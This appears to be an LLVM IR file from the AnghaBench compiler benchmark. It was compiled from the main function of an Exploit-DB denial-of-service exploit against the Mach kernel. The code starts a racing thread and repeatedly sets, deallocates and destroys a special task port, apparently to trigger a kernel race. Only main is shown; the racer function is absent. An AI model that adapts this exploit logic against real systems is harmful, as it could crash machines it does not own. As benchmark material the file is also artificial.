; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_41165.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_41165.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@racer = common dso_local global i32 0, align 4
@TASK_HOST_PORT = common dso_local global i32 0, align 4
@start = common dso_local global i32 0, align 4
@MACH_PORT_NULL = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %5 = load i32, i32* @racer, align 4
  %6 = call i32 @pthread_create(i32* %2, i32* null, i32 %5, i32* null)
  br label %7

7:                                                ; preds = %7, %0
  %8 = call i32 (...) @q()
  store i32 %8, i32* %3, align 4
  %9 = call i32 (...) @mach_task_self()
  %10 = load i32, i32* @TASK_HOST_PORT, align 4
  %11 = load i32, i32* %3, align 4
  %12 = call i32 @task_set_special_port(i32 %9, i32 %10, i32 %11)
  store i32 %12, i32* %4, align 4
  %13 = call i32 (...) @mach_task_self()
  %14 = load i32, i32* %3, align 4
  %15 = call i32 @mach_port_deallocate(i32 %13, i32 %14)
  %16 = call i32 (...) @mach_task_self()
  %17 = load i32, i32* %3, align 4
  %18 = call i32 @mach_port_destroy(i32 %16, i32 %17)
  store i32 1, i32* @start, align 4
  %19 = call i32 (...) @mach_host_self()
  %20 = load i32, i32* @TASK_HOST_PORT, align 4
  %21 = load i32, i32* @MACH_PORT_NULL, align 4
  %22 = call i32 @task_set_special_port(i32 %19, i32 %20, i32 %21)
  br label %7
}

declare !callback !2 dso_local i32 @pthread_create(i32*, i32*, i32, i32*) #1

declare dso_local i32 @q(...) #1

declare dso_local i32 @task_set_special_port(i32, i32, i32) #1

declare dso_local i32 @mach_task_self(...) #1

declare dso_local i32 @mach_port_deallocate(i32, i32) #1

declare dso_local i32 @mach_port_destroy(i32, i32) #1

declare dso_local i32 @mach_host_self(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
!2 = !{!3}
!3 = !{i64 2, i64 3, i1 false}
